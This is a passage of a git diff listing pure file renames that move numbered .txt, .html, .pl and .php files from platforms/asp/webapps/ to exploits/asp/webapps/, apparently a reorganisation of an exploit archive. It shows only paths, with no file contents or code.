exploits/asp/webapps/30250.txt diff --git a/platforms/asp/webapps/30282.txt b/exploits/asp/webapps/30282.txt similarity index 100% rename from platforms/asp/webapps/30282.txt rename to exploits/asp/webapps/30282.txt diff --git a/platforms/asp/webapps/30289.txt b/exploits/asp/webapps/30289.txt similarity index 100% rename from platforms/asp/webapps/30289.txt rename to exploits/asp/webapps/30289.txt diff --git a/platforms/asp/webapps/30296.txt b/exploits/asp/webapps/30296.txt similarity index 100% rename from platforms/asp/webapps/30296.txt rename to exploits/asp/webapps/30296.txt diff --git a/platforms/asp/webapps/30297.txt b/exploits/asp/webapps/30297.txt similarity index 100% rename from platforms/asp/webapps/30297.txt rename to exploits/asp/webapps/30297.txt diff --git a/platforms/asp/webapps/30298.txt b/exploits/asp/webapps/30298.txt similarity index 100% rename from platforms/asp/webapps/30298.txt rename to exploits/asp/webapps/30298.txt diff --git a/platforms/asp/webapps/30300.txt b/exploits/asp/webapps/30300.txt similarity index 100% rename from platforms/asp/webapps/30300.txt rename to exploits/asp/webapps/30300.txt diff --git a/platforms/asp/webapps/3031.txt b/exploits/asp/webapps/3031.txt similarity index 100% rename from platforms/asp/webapps/3031.txt rename to exploits/asp/webapps/3031.txt diff --git a/platforms/asp/webapps/30313.txt b/exploits/asp/webapps/30313.txt similarity index 100% rename from platforms/asp/webapps/30313.txt rename to exploits/asp/webapps/30313.txt diff --git a/platforms/asp/webapps/30316.txt b/exploits/asp/webapps/30316.txt similarity index 100% rename from platforms/asp/webapps/30316.txt rename to exploits/asp/webapps/30316.txt diff --git a/platforms/asp/webapps/3032.txt b/exploits/asp/webapps/3032.txt similarity index 100% rename from platforms/asp/webapps/3032.txt rename to exploits/asp/webapps/3032.txt diff --git a/platforms/asp/webapps/30327.html b/exploits/asp/webapps/30327.html similarity index 100% rename from platforms/asp/webapps/30327.html rename to exploits/asp/webapps/30327.html diff --git a/platforms/asp/webapps/30328.txt b/exploits/asp/webapps/30328.txt similarity index 100% rename from platforms/asp/webapps/30328.txt rename to exploits/asp/webapps/30328.txt diff --git a/platforms/asp/webapps/30330.txt b/exploits/asp/webapps/30330.txt similarity index 100% rename from platforms/asp/webapps/30330.txt rename to exploits/asp/webapps/30330.txt diff --git a/platforms/asp/webapps/30331.html b/exploits/asp/webapps/30331.html similarity index 100% rename from platforms/asp/webapps/30331.html rename to exploits/asp/webapps/30331.html diff --git a/platforms/asp/webapps/30332.txt b/exploits/asp/webapps/30332.txt similarity index 100% rename from platforms/asp/webapps/30332.txt rename to exploits/asp/webapps/30332.txt diff --git a/platforms/asp/webapps/3035.txt b/exploits/asp/webapps/3035.txt similarity index 100% rename from platforms/asp/webapps/3035.txt rename to exploits/asp/webapps/3035.txt diff --git a/platforms/asp/webapps/30382.txt b/exploits/asp/webapps/30382.txt similarity index 100% rename from platforms/asp/webapps/30382.txt rename to exploits/asp/webapps/30382.txt diff --git a/platforms/asp/webapps/30402.txt b/exploits/asp/webapps/30402.txt similarity index 100% rename from platforms/asp/webapps/30402.txt rename to exploits/asp/webapps/30402.txt diff --git a/platforms/asp/webapps/30423.txt b/exploits/asp/webapps/30423.txt similarity index 100% rename from platforms/asp/webapps/30423.txt rename to exploits/asp/webapps/30423.txt diff --git a/platforms/asp/webapps/30424.txt b/exploits/asp/webapps/30424.txt similarity index 100% rename from platforms/asp/webapps/30424.txt rename to exploits/asp/webapps/30424.txt diff --git a/platforms/asp/webapps/30425.txt b/exploits/asp/webapps/30425.txt similarity index 100% rename from platforms/asp/webapps/30425.txt rename to exploits/asp/webapps/30425.txt diff --git a/platforms/asp/webapps/30426.txt b/exploits/asp/webapps/30426.txt similarity index 100% rename from platforms/asp/webapps/30426.txt rename to exploits/asp/webapps/30426.txt diff --git a/platforms/asp/webapps/30427.txt b/exploits/asp/webapps/30427.txt similarity index 100% rename from platforms/asp/webapps/30427.txt rename to exploits/asp/webapps/30427.txt diff --git a/platforms/asp/webapps/30428.txt b/exploits/asp/webapps/30428.txt similarity index 100% rename from platforms/asp/webapps/30428.txt rename to exploits/asp/webapps/30428.txt diff --git a/platforms/asp/webapps/30446.txt b/exploits/asp/webapps/30446.txt similarity index 100% rename from platforms/asp/webapps/30446.txt rename to exploits/asp/webapps/30446.txt diff --git a/platforms/asp/webapps/30451.txt b/exploits/asp/webapps/30451.txt similarity index 100% rename from platforms/asp/webapps/30451.txt rename to exploits/asp/webapps/30451.txt diff --git a/platforms/asp/webapps/3046.txt b/exploits/asp/webapps/3046.txt similarity index 100% rename from platforms/asp/webapps/3046.txt rename to exploits/asp/webapps/3046.txt diff --git a/platforms/asp/webapps/3048.pl b/exploits/asp/webapps/3048.pl similarity index 100% rename from platforms/asp/webapps/3048.pl rename to exploits/asp/webapps/3048.pl diff --git a/platforms/asp/webapps/30505.txt b/exploits/asp/webapps/30505.txt similarity index 100% rename from platforms/asp/webapps/30505.txt rename to exploits/asp/webapps/30505.txt diff --git a/platforms/asp/webapps/30541.txt b/exploits/asp/webapps/30541.txt similarity index 100% rename from platforms/asp/webapps/30541.txt rename to exploits/asp/webapps/30541.txt diff --git a/platforms/asp/webapps/30545.txt b/exploits/asp/webapps/30545.txt similarity index 100% rename from platforms/asp/webapps/30545.txt rename to exploits/asp/webapps/30545.txt diff --git a/platforms/asp/webapps/30564.txt b/exploits/asp/webapps/30564.txt similarity index 100% rename from platforms/asp/webapps/30564.txt rename to exploits/asp/webapps/30564.txt diff --git a/platforms/asp/webapps/30571.txt b/exploits/asp/webapps/30571.txt similarity index 100% rename from platforms/asp/webapps/30571.txt rename to exploits/asp/webapps/30571.txt diff --git a/platforms/asp/webapps/3060.txt b/exploits/asp/webapps/3060.txt similarity index 100% rename from platforms/asp/webapps/3060.txt rename to exploits/asp/webapps/3060.txt diff --git a/platforms/asp/webapps/3061.txt b/exploits/asp/webapps/3061.txt similarity index 100% rename from platforms/asp/webapps/3061.txt rename to exploits/asp/webapps/3061.txt diff --git a/platforms/asp/webapps/3062.txt b/exploits/asp/webapps/3062.txt similarity index 100% rename from platforms/asp/webapps/3062.txt rename to exploits/asp/webapps/3062.txt diff --git a/platforms/asp/webapps/30621.txt b/exploits/asp/webapps/30621.txt similarity index 100% rename from platforms/asp/webapps/30621.txt rename to exploits/asp/webapps/30621.txt diff --git a/platforms/asp/webapps/30624.txt b/exploits/asp/webapps/30624.txt similarity index 100% rename from platforms/asp/webapps/30624.txt rename to exploits/asp/webapps/30624.txt diff --git a/platforms/asp/webapps/30625.txt b/exploits/asp/webapps/30625.txt similarity index 100% rename from platforms/asp/webapps/30625.txt rename to exploits/asp/webapps/30625.txt diff --git a/platforms/asp/webapps/30626.txt b/exploits/asp/webapps/30626.txt similarity index 100% rename from platforms/asp/webapps/30626.txt rename to exploits/asp/webapps/30626.txt diff --git a/platforms/asp/webapps/30629.txt b/exploits/asp/webapps/30629.txt similarity index 100% rename from platforms/asp/webapps/30629.txt rename to exploits/asp/webapps/30629.txt diff --git a/platforms/asp/webapps/3066.txt b/exploits/asp/webapps/3066.txt similarity index 100% rename from platforms/asp/webapps/3066.txt rename to exploits/asp/webapps/3066.txt diff --git a/platforms/asp/webapps/3068.html b/exploits/asp/webapps/3068.html similarity index 100% rename from platforms/asp/webapps/3068.html rename to exploits/asp/webapps/3068.html diff --git a/platforms/asp/webapps/30696.txt b/exploits/asp/webapps/30696.txt similarity index 100% rename from platforms/asp/webapps/30696.txt rename to exploits/asp/webapps/30696.txt diff --git a/platforms/asp/webapps/30706.txt b/exploits/asp/webapps/30706.txt similarity index 100% rename from platforms/asp/webapps/30706.txt rename to exploits/asp/webapps/30706.txt diff --git a/platforms/asp/webapps/30708.txt b/exploits/asp/webapps/30708.txt similarity index 100% rename from platforms/asp/webapps/30708.txt rename to exploits/asp/webapps/30708.txt diff --git a/platforms/asp/webapps/3073.txt b/exploits/asp/webapps/3073.txt similarity index 100% rename from platforms/asp/webapps/3073.txt rename to exploits/asp/webapps/3073.txt diff --git a/platforms/asp/webapps/3074.txt b/exploits/asp/webapps/3074.txt similarity index 100% rename from platforms/asp/webapps/3074.txt rename to exploits/asp/webapps/3074.txt diff --git a/platforms/asp/webapps/30743.txt b/exploits/asp/webapps/30743.txt similarity index 100% rename from platforms/asp/webapps/30743.txt rename to exploits/asp/webapps/30743.txt diff --git a/platforms/asp/webapps/30747.txt b/exploits/asp/webapps/30747.txt similarity index 100% rename from platforms/asp/webapps/30747.txt rename to exploits/asp/webapps/30747.txt diff --git a/platforms/asp/webapps/30775.txt b/exploits/asp/webapps/30775.txt similarity index 100% rename from platforms/asp/webapps/30775.txt rename to exploits/asp/webapps/30775.txt diff --git a/platforms/asp/webapps/30778.txt b/exploits/asp/webapps/30778.txt similarity index 100% rename from platforms/asp/webapps/30778.txt rename to exploits/asp/webapps/30778.txt diff --git a/platforms/asp/webapps/30793.txt b/exploits/asp/webapps/30793.txt similarity index 100% rename from platforms/asp/webapps/30793.txt rename to exploits/asp/webapps/30793.txt diff --git a/platforms/asp/webapps/30794.txt b/exploits/asp/webapps/30794.txt similarity index 100% rename from platforms/asp/webapps/30794.txt rename to exploits/asp/webapps/30794.txt diff --git a/platforms/asp/webapps/30796.txt b/exploits/asp/webapps/30796.txt similarity index 100% rename from platforms/asp/webapps/30796.txt rename to exploits/asp/webapps/30796.txt diff --git a/platforms/asp/webapps/30800.html b/exploits/asp/webapps/30800.html similarity index 100% rename from platforms/asp/webapps/30800.html rename to exploits/asp/webapps/30800.html diff --git a/platforms/asp/webapps/30807.txt b/exploits/asp/webapps/30807.txt similarity index 100% rename from platforms/asp/webapps/30807.txt rename to exploits/asp/webapps/30807.txt diff --git a/platforms/asp/webapps/3081.pl b/exploits/asp/webapps/3081.pl similarity index 100% rename from platforms/asp/webapps/3081.pl rename to exploits/asp/webapps/3081.pl diff --git a/platforms/asp/webapps/30841.txt b/exploits/asp/webapps/30841.txt similarity index 100% rename from platforms/asp/webapps/30841.txt rename to exploits/asp/webapps/30841.txt diff --git a/platforms/asp/webapps/30842.txt b/exploits/asp/webapps/30842.txt similarity index 100% rename from platforms/asp/webapps/30842.txt rename to exploits/asp/webapps/30842.txt diff --git a/platforms/asp/webapps/30843.txt b/exploits/asp/webapps/30843.txt similarity index 100% rename from platforms/asp/webapps/30843.txt rename to exploits/asp/webapps/30843.txt diff --git a/platforms/asp/webapps/30844.txt b/exploits/asp/webapps/30844.txt similarity index 100% rename from platforms/asp/webapps/30844.txt rename to exploits/asp/webapps/30844.txt diff --git a/platforms/asp/webapps/30845.txt b/exploits/asp/webapps/30845.txt similarity index 100% rename from platforms/asp/webapps/30845.txt rename to exploits/asp/webapps/30845.txt diff --git a/platforms/asp/webapps/30855.txt b/exploits/asp/webapps/30855.txt similarity index 100% rename from platforms/asp/webapps/30855.txt rename to exploits/asp/webapps/30855.txt diff --git a/platforms/asp/webapps/30860.txt b/exploits/asp/webapps/30860.txt similarity index 100% rename from platforms/asp/webapps/30860.txt rename to exploits/asp/webapps/30860.txt diff --git a/platforms/asp/webapps/3089.txt b/exploits/asp/webapps/3089.txt similarity index 100% rename from platforms/asp/webapps/3089.txt rename to exploits/asp/webapps/3089.txt diff --git a/platforms/asp/webapps/30938.txt b/exploits/asp/webapps/30938.txt similarity index 100% rename from platforms/asp/webapps/30938.txt rename to exploits/asp/webapps/30938.txt diff --git a/platforms/asp/webapps/30940.txt b/exploits/asp/webapps/30940.txt similarity index 100% rename from platforms/asp/webapps/30940.txt rename to exploits/asp/webapps/30940.txt diff --git a/platforms/asp/webapps/30941.txt b/exploits/asp/webapps/30941.txt similarity index 100% rename from platforms/asp/webapps/30941.txt rename to exploits/asp/webapps/30941.txt diff --git a/platforms/asp/webapps/30963.txt b/exploits/asp/webapps/30963.txt similarity index 100% rename from platforms/asp/webapps/30963.txt rename to exploits/asp/webapps/30963.txt diff --git a/platforms/asp/webapps/30993.txt b/exploits/asp/webapps/30993.txt similarity index 100% rename from platforms/asp/webapps/30993.txt rename to exploits/asp/webapps/30993.txt diff --git a/platforms/asp/webapps/31017.php b/exploits/asp/webapps/31017.php similarity index 100% rename from platforms/asp/webapps/31017.php rename to exploits/asp/webapps/31017.php diff --git a/platforms/asp/webapps/31042.txt b/exploits/asp/webapps/31042.txt similarity index 100% rename from platforms/asp/webapps/31042.txt rename to exploits/asp/webapps/31042.txt diff --git a/platforms/asp/webapps/3105.txt b/exploits/asp/webapps/3105.txt similarity index 100% rename from platforms/asp/webapps/3105.txt rename to exploits/asp/webapps/3105.txt diff --git a/platforms/asp/webapps/31055.txt b/exploits/asp/webapps/31055.txt similarity index 100% rename from platforms/asp/webapps/31055.txt rename to exploits/asp/webapps/31055.txt diff --git a/platforms/asp/webapps/31058.txt b/exploits/asp/webapps/31058.txt similarity index 100% rename from platforms/asp/webapps/31058.txt rename to exploits/asp/webapps/31058.txt diff --git a/platforms/asp/webapps/31059.txt b/exploits/asp/webapps/31059.txt similarity index 100% rename from platforms/asp/webapps/31059.txt rename to exploits/asp/webapps/31059.txt diff --git a/platforms/asp/webapps/31070.txt b/exploits/asp/webapps/31070.txt similarity index 100% rename from platforms/asp/webapps/31070.txt rename to exploits/asp/webapps/31070.txt diff --git a/platforms/asp/webapps/31103.txt b/exploits/asp/webapps/31103.txt similarity index 100% rename from platforms/asp/webapps/31103.txt rename to exploits/asp/webapps/31103.txt diff --git a/platforms/asp/webapps/31104.txt b/exploits/asp/webapps/31104.txt similarity index 100% rename from platforms/asp/webapps/31104.txt rename to exploits/asp/webapps/31104.txt diff --git a/platforms/asp/webapps/31117.txt b/exploits/asp/webapps/31117.txt similarity index 100% rename from platforms/asp/webapps/31117.txt rename to exploits/asp/webapps/31117.txt diff --git a/platforms/asp/webapps/3115.txt b/exploits/asp/webapps/3115.txt similarity index 100% rename from platforms/asp/webapps/3115.txt rename to exploits/asp/webapps/3115.txt diff --git a/platforms/asp/webapps/31191.txt b/exploits/asp/webapps/31191.txt similarity index 100% rename from platforms/asp/webapps/31191.txt rename to exploits/asp/webapps/31191.txt diff --git a/platforms/asp/webapps/3122.pl b/exploits/asp/webapps/3122.pl similarity index 100% rename from platforms/asp/webapps/3122.pl rename to exploits/asp/webapps/3122.pl diff --git a/platforms/asp/webapps/31275.txt b/exploits/asp/webapps/31275.txt similarity index 100% rename from platforms/asp/webapps/31275.txt rename to exploits/asp/webapps/31275.txt diff --git a/platforms/asp/webapps/31276.txt b/exploits/asp/webapps/31276.txt similarity index 100% rename from platforms/asp/webapps/31276.txt rename to exploits/asp/webapps/31276.txt diff --git a/platforms/asp/webapps/31286.txt b/exploits/asp/webapps/31286.txt similarity index 100% rename from platforms/asp/webapps/31286.txt rename to exploits/asp/webapps/31286.txt diff --git a/platforms/asp/webapps/31314.txt b/exploits/asp/webapps/31314.txt similarity index 100% rename from platforms/asp/webapps/31314.txt rename to exploits/asp/webapps/31314.txt diff --git a/platforms/asp/webapps/3135.txt b/exploits/asp/webapps/3135.txt similarity index 100% rename from platforms/asp/webapps/3135.txt rename to exploits/asp/webapps/3135.txt diff --git a/platforms/asp/webapps/31404.txt b/exploits/asp/webapps/31404.txt similarity index 100% rename from platforms/asp/webapps/31404.txt rename to exploits/asp/webapps/31404.txt diff --git a/platforms/asp/webapps/31413.txt b/exploits/asp/webapps/31413.txt similarity index 100% rename from platforms/asp/webapps/31413.txt rename to exploits/asp/webapps/31413.txt diff --git a/platforms/asp/webapps/31442.txt b/exploits/asp/webapps/31442.txt similarity index 100% rename from platforms/asp/webapps/31442.txt rename to exploits/asp/webapps/31442.txt diff --git a/platforms/asp/webapps/31463.txt b/exploits/asp/webapps/31463.txt similarity index 100% rename from platforms/asp/webapps/31463.txt rename to exploits/asp/webapps/31463.txt diff --git a/platforms/asp/webapps/31546.txt b/exploits/asp/webapps/31546.txt similarity index 100% rename from platforms/asp/webapps/31546.txt rename to exploits/asp/webapps/31546.txt diff --git a/platforms/asp/webapps/31547.txt b/exploits/asp/webapps/31547.txt similarity index 100% rename from platforms/asp/webapps/31547.txt rename to exploits/asp/webapps/31547.txt diff --git a/platforms/asp/webapps/31582.txt b/exploits/asp/webapps/31582.txt similarity index 100% rename from platforms/asp/webapps/31582.txt rename to exploits/asp/webapps/31582.txt diff --git a/platforms/asp/webapps/31644.txt b/exploits/asp/webapps/31644.txt similarity index 100% rename from platforms/asp/webapps/31644.txt rename to exploits/asp/webapps/31644.txt diff --git a/platforms/asp/webapps/31645.txt b/exploits/asp/webapps/31645.txt similarity index 100% rename from platforms/asp/webapps/31645.txt rename to exploits/asp/webapps/31645.txt diff --git a/platforms/asp/webapps/31646.txt b/exploits/asp/webapps/31646.txt similarity index 100% rename from platforms/asp/webapps/31646.txt rename to exploits/asp/webapps/31646.txt diff --git a/platforms/asp/webapps/31648.txt b/exploits/asp/webapps/31648.txt similarity index 100% rename from platforms/asp/webapps/31648.txt rename to exploits/asp/webapps/31648.txt diff --git a/platforms/asp/webapps/31649.txt b/exploits/asp/webapps/31649.txt similarity index 100% rename from platforms/asp/webapps/31649.txt rename to exploits/asp/webapps/31649.txt diff --git a/platforms/asp/webapps/31650.txt b/exploits/asp/webapps/31650.txt similarity index 100% rename from platforms/asp/webapps/31650.txt rename to exploits/asp/webapps/31650.txt diff --git a/platforms/asp/webapps/31666.txt b/exploits/asp/webapps/31666.txt similarity index 100% rename from platforms/asp/webapps/31666.txt rename to exploits/asp/webapps/31666.txt diff --git a/platforms/asp/webapps/31797.txt b/exploits/asp/webapps/31797.txt similarity index 100% rename from platforms/asp/webapps/31797.txt rename to exploits/asp/webapps/31797.txt diff --git a/platforms/asp/webapps/31811.txt b/exploits/asp/webapps/31811.txt similarity index 100% rename from platforms/asp/webapps/31811.txt rename to exploits/asp/webapps/31811.txt diff --git a/platforms/asp/webapps/31812.txt b/exploits/asp/webapps/31812.txt similarity index 100% rename from platforms/asp/webapps/31812.txt rename to exploits/asp/webapps/31812.txt diff --git a/platforms/asp/webapps/31843.txt b/exploits/asp/webapps/31843.txt similarity index 100% rename from platforms/asp/webapps/31843.txt rename to exploits/asp/webapps/31843.txt diff --git a/platforms/asp/webapps/31850.txt b/exploits/asp/webapps/31850.txt similarity index 100% rename from platforms/asp/webapps/31850.txt rename to exploits/asp/webapps/31850.txt diff --git a/platforms/asp/webapps/31851.txt b/exploits/asp/webapps/31851.txt similarity index 100% rename from platforms/asp/webapps/31851.txt rename to exploits/asp/webapps/31851.txt diff --git a/platforms/asp/webapps/31852.txt b/exploits/asp/webapps/31852.txt similarity index 100% rename from platforms/asp/webapps/31852.txt rename to exploits/asp/webapps/31852.txt diff --git a/platforms/asp/webapps/31854.html b/exploits/asp/webapps/31854.html similarity index 100% rename from platforms/asp/webapps/31854.html rename to exploits/asp/webapps/31854.html diff --git a/platforms/asp/webapps/31859.txt b/exploits/asp/webapps/31859.txt similarity index 100% rename from platforms/asp/webapps/31859.txt rename to exploits/asp/webapps/31859.txt diff --git a/platforms/asp/webapps/3186.txt b/exploits/asp/webapps/3186.txt similarity index 100% rename from platforms/asp/webapps/3186.txt rename to exploits/asp/webapps/3186.txt diff --git a/platforms/asp/webapps/31860.txt b/exploits/asp/webapps/31860.txt similarity index 100% rename from platforms/asp/webapps/31860.txt rename to exploits/asp/webapps/31860.txt diff --git a/platforms/asp/webapps/31861.txt b/exploits/asp/webapps/31861.txt similarity index 100% rename from platforms/asp/webapps/31861.txt rename to exploits/asp/webapps/31861.txt diff --git a/platforms/asp/webapps/31865.txt b/exploits/asp/webapps/31865.txt similarity index 100% rename from platforms/asp/webapps/31865.txt rename to exploits/asp/webapps/31865.txt diff --git a/platforms/asp/webapps/31869.txt b/exploits/asp/webapps/31869.txt similarity index 100% rename from platforms/asp/webapps/31869.txt rename to exploits/asp/webapps/31869.txt diff --git a/platforms/asp/webapps/3187.txt b/exploits/asp/webapps/3187.txt similarity index 100% rename from platforms/asp/webapps/3187.txt rename to exploits/asp/webapps/3187.txt diff --git a/platforms/asp/webapps/31871.txt b/exploits/asp/webapps/31871.txt similarity index 100% rename from platforms/asp/webapps/31871.txt rename to exploits/asp/webapps/31871.txt diff --git a/platforms/asp/webapps/31891.txt b/exploits/asp/webapps/31891.txt similarity index 100% rename from platforms/asp/webapps/31891.txt rename to exploits/asp/webapps/31891.txt diff --git a/platforms/asp/webapps/3194.txt b/exploits/asp/webapps/3194.txt similarity index 100% rename from platforms/asp/webapps/3194.txt rename to exploits/asp/webapps/3194.txt diff --git a/platforms/asp/webapps/3195.txt b/exploits/asp/webapps/3195.txt similarity index 100% rename from platforms/asp/webapps/3195.txt rename to exploits/asp/webapps/3195.txt diff --git a/platforms/asp/webapps/31967.txt b/exploits/asp/webapps/31967.txt similarity index 100% rename from platforms/asp/webapps/31967.txt rename to exploits/asp/webapps/31967.txt diff --git a/platforms/asp/webapps/3197.txt b/exploits/asp/webapps/3197.txt similarity index 100% rename from platforms/asp/webapps/3197.txt rename to exploits/asp/webapps/3197.txt diff --git a/platforms/asp/webapps/3210.txt b/exploits/asp/webapps/3210.txt similarity index 100% rename from platforms/asp/webapps/3210.txt rename to exploits/asp/webapps/3210.txt diff --git a/platforms/asp/webapps/32111.txt b/exploits/asp/webapps/32111.txt similarity index 100% rename from platforms/asp/webapps/32111.txt rename to exploits/asp/webapps/32111.txt diff --git a/platforms/asp/webapps/32119.txt b/exploits/asp/webapps/32119.txt similarity index 100% rename from platforms/asp/webapps/32119.txt rename to exploits/asp/webapps/32119.txt diff --git a/platforms/asp/webapps/32120.txt b/exploits/asp/webapps/32120.txt similarity index 100% rename from platforms/asp/webapps/32120.txt rename to exploits/asp/webapps/32120.txt diff --git a/platforms/asp/webapps/32151.pl b/exploits/asp/webapps/32151.pl similarity index 100% rename from platforms/asp/webapps/32151.pl rename to exploits/asp/webapps/32151.pl diff --git a/platforms/asp/webapps/32157.txt b/exploits/asp/webapps/32157.txt similarity index 100% rename from platforms/asp/webapps/32157.txt rename to exploits/asp/webapps/32157.txt diff --git a/platforms/asp/webapps/32184.txt b/exploits/asp/webapps/32184.txt similarity index 100% rename from platforms/asp/webapps/32184.txt rename to exploits/asp/webapps/32184.txt diff --git a/platforms/asp/webapps/32185.txt b/exploits/asp/webapps/32185.txt similarity index 100% rename from platforms/asp/webapps/32185.txt rename to exploits/asp/webapps/32185.txt diff --git a/platforms/asp/webapps/32212.txt b/exploits/asp/webapps/32212.txt similarity index 100% rename from platforms/asp/webapps/32212.txt rename to exploits/asp/webapps/32212.txt diff --git a/platforms/asp/webapps/32255.txt b/exploits/asp/webapps/32255.txt similarity index 100% rename from platforms/asp/webapps/32255.txt rename to exploits/asp/webapps/32255.txt diff --git a/platforms/asp/webapps/32278.txt b/exploits/asp/webapps/32278.txt similarity index 100% rename from platforms/asp/webapps/32278.txt rename to exploits/asp/webapps/32278.txt diff --git a/platforms/asp/webapps/32297.txt b/exploits/asp/webapps/32297.txt similarity index 100% rename from platforms/asp/webapps/32297.txt rename to exploits/asp/webapps/32297.txt diff --git a/platforms/asp/webapps/32300.txt b/exploits/asp/webapps/32300.txt similarity index 100% rename from platforms/asp/webapps/32300.txt rename to exploits/asp/webapps/32300.txt diff --git a/platforms/asp/webapps/3233.txt b/exploits/asp/webapps/3233.txt similarity index 100% rename from platforms/asp/webapps/3233.txt rename to exploits/asp/webapps/3233.txt diff --git a/platforms/asp/webapps/32394.txt b/exploits/asp/webapps/32394.txt similarity index 100% rename from platforms/asp/webapps/32394.txt rename to exploits/asp/webapps/32394.txt diff --git a/platforms/asp/webapps/32401.txt b/exploits/asp/webapps/32401.txt similarity index 100% rename from platforms/asp/webapps/32401.txt rename to exploits/asp/webapps/32401.txt diff --git a/platforms/asp/webapps/3241.txt b/exploits/asp/webapps/3241.txt similarity index 100% rename from platforms/asp/webapps/3241.txt rename to exploits/asp/webapps/3241.txt diff --git a/platforms/asp/webapps/32412.txt b/exploits/asp/webapps/32412.txt similarity index 100% rename from platforms/asp/webapps/32412.txt rename to exploits/asp/webapps/32412.txt diff --git a/platforms/asp/webapps/32485.txt b/exploits/asp/webapps/32485.txt similarity index 100% rename from platforms/asp/webapps/32485.txt rename to exploits/asp/webapps/32485.txt diff --git a/platforms/asp/webapps/32498.txt b/exploits/asp/webapps/32498.txt similarity index 100% rename from platforms/asp/webapps/32498.txt rename to exploits/asp/webapps/32498.txt diff --git a/platforms/asp/webapps/32500.txt b/exploits/asp/webapps/32500.txt similarity index 100% rename from platforms/asp/webapps/32500.txt rename to exploits/asp/webapps/32500.txt diff --git a/platforms/asp/webapps/32549.txt b/exploits/asp/webapps/32549.txt similarity index 100% rename from platforms/asp/webapps/32549.txt rename to exploits/asp/webapps/32549.txt diff --git a/platforms/asp/webapps/32577.txt b/exploits/asp/webapps/32577.txt similarity index 100% rename from platforms/asp/webapps/32577.txt rename to exploits/asp/webapps/32577.txt diff --git a/platforms/asp/webapps/32580.txt b/exploits/asp/webapps/32580.txt similarity index 100% rename from platforms/asp/webapps/32580.txt rename to exploits/asp/webapps/32580.txt diff --git a/platforms/asp/webapps/32601.txt b/exploits/asp/webapps/32601.txt similarity index 100% rename from platforms/asp/webapps/32601.txt rename to exploits/asp/webapps/32601.txt diff --git a/platforms/asp/webapps/32602.txt b/exploits/asp/webapps/32602.txt similarity index 100% rename from platforms/asp/webapps/32602.txt rename to exploits/asp/webapps/32602.txt diff --git a/platforms/asp/webapps/32603.txt b/exploits/asp/webapps/32603.txt similarity index 100% rename from platforms/asp/webapps/32603.txt rename to exploits/asp/webapps/32603.txt diff --git a/platforms/asp/webapps/32604.txt b/exploits/asp/webapps/32604.txt similarity index 100% rename from platforms/asp/webapps/32604.txt rename to exploits/asp/webapps/32604.txt diff --git a/platforms/asp/webapps/32609.txt b/exploits/asp/webapps/32609.txt similarity index 100% rename from platforms/asp/webapps/32609.txt rename to exploits/asp/webapps/32609.txt diff --git a/platforms/asp/webapps/32610.txt b/exploits/asp/webapps/32610.txt similarity index 100% rename from platforms/asp/webapps/32610.txt rename to exploits/asp/webapps/32610.txt diff --git a/platforms/asp/webapps/32611.txt b/exploits/asp/webapps/32611.txt similarity index 100% rename from platforms/asp/webapps/32611.txt rename to exploits/asp/webapps/32611.txt diff --git a/platforms/asp/webapps/32626.txt b/exploits/asp/webapps/32626.txt similarity index 100% rename from platforms/asp/webapps/32626.txt rename to exploits/asp/webapps/32626.txt diff --git a/platforms/asp/webapps/32628.txt b/exploits/asp/webapps/32628.txt similarity index 100% rename from platforms/asp/webapps/32628.txt rename to exploits/asp/webapps/32628.txt diff --git a/platforms/asp/webapps/32629.txt b/exploits/asp/webapps/32629.txt similarity index 100% rename from platforms/asp/webapps/32629.txt rename to exploits/asp/webapps/32629.txt diff --git a/platforms/asp/webapps/32630.txt b/exploits/asp/webapps/32630.txt similarity index 100% rename from platforms/asp/webapps/32630.txt rename to exploits/asp/webapps/32630.txt diff --git a/platforms/asp/webapps/32635.txt b/exploits/asp/webapps/32635.txt similarity index 100% rename from platforms/asp/webapps/32635.txt rename to exploits/asp/webapps/32635.txt diff --git a/platforms/asp/webapps/32653.txt b/exploits/asp/webapps/32653.txt similarity index 100% rename from platforms/asp/webapps/32653.txt rename to exploits/asp/webapps/32653.txt diff --git a/platforms/asp/webapps/32658.txt b/exploits/asp/webapps/32658.txt similarity index 100% rename from platforms/asp/webapps/32658.txt rename to exploits/asp/webapps/32658.txt diff --git a/platforms/asp/webapps/32660.txt b/exploits/asp/webapps/32660.txt similarity index 100% rename from platforms/asp/webapps/32660.txt rename to exploits/asp/webapps/32660.txt diff --git a/platforms/asp/webapps/32683.txt b/exploits/asp/webapps/32683.txt similarity index 100% rename from platforms/asp/webapps/32683.txt rename to exploits/asp/webapps/32683.txt diff --git a/platforms/asp/webapps/32687.txt b/exploits/asp/webapps/32687.txt similarity index 100% rename from platforms/asp/webapps/32687.txt rename to exploits/asp/webapps/32687.txt diff --git a/platforms/asp/webapps/32716.html b/exploits/asp/webapps/32716.html similarity index 100% rename from platforms/asp/webapps/32716.html rename to exploits/asp/webapps/32716.html diff --git a/platforms/asp/webapps/32729.txt b/exploits/asp/webapps/32729.txt similarity index 100% rename from platforms/asp/webapps/32729.txt rename to exploits/asp/webapps/32729.txt diff --git a/platforms/asp/webapps/32730.txt b/exploits/asp/webapps/32730.txt similarity index 100% rename from platforms/asp/webapps/32730.txt rename to exploits/asp/webapps/32730.txt diff --git a/platforms/asp/webapps/32731.txt b/exploits/asp/webapps/32731.txt similarity index 100% rename from platforms/asp/webapps/32731.txt rename to exploits/asp/webapps/32731.txt diff --git a/platforms/asp/webapps/32735.txt b/exploits/asp/webapps/32735.txt similarity index 100% rename from platforms/asp/webapps/32735.txt rename to exploits/asp/webapps/32735.txt diff --git a/platforms/asp/webapps/32736.txt b/exploits/asp/webapps/32736.txt similarity index 100% rename from platforms/asp/webapps/32736.txt rename to exploits/asp/webapps/32736.txt diff --git a/platforms/asp/webapps/32748.txt b/exploits/asp/webapps/32748.txt similarity index 100% rename from platforms/asp/webapps/32748.txt rename to exploits/asp/webapps/32748.txt diff --git a/platforms/asp/webapps/32750.txt b/exploits/asp/webapps/32750.txt similarity index 100% rename from platforms/asp/webapps/32750.txt rename to exploits/asp/webapps/32750.txt diff --git a/platforms/asp/webapps/32756.txt b/exploits/asp/webapps/32756.txt similarity index 100% rename from platforms/asp/webapps/32756.txt rename to exploits/asp/webapps/32756.txt diff --git a/platforms/asp/webapps/32758.txt b/exploits/asp/webapps/32758.txt similarity index 100% rename from platforms/asp/webapps/32758.txt rename to exploits/asp/webapps/32758.txt diff --git a/platforms/asp/webapps/32797.txt b/exploits/asp/webapps/32797.txt similarity index 100% rename from platforms/asp/webapps/32797.txt rename to exploits/asp/webapps/32797.txt diff --git a/platforms/asp/webapps/32833.txt b/exploits/asp/webapps/32833.txt similarity index 100% rename from 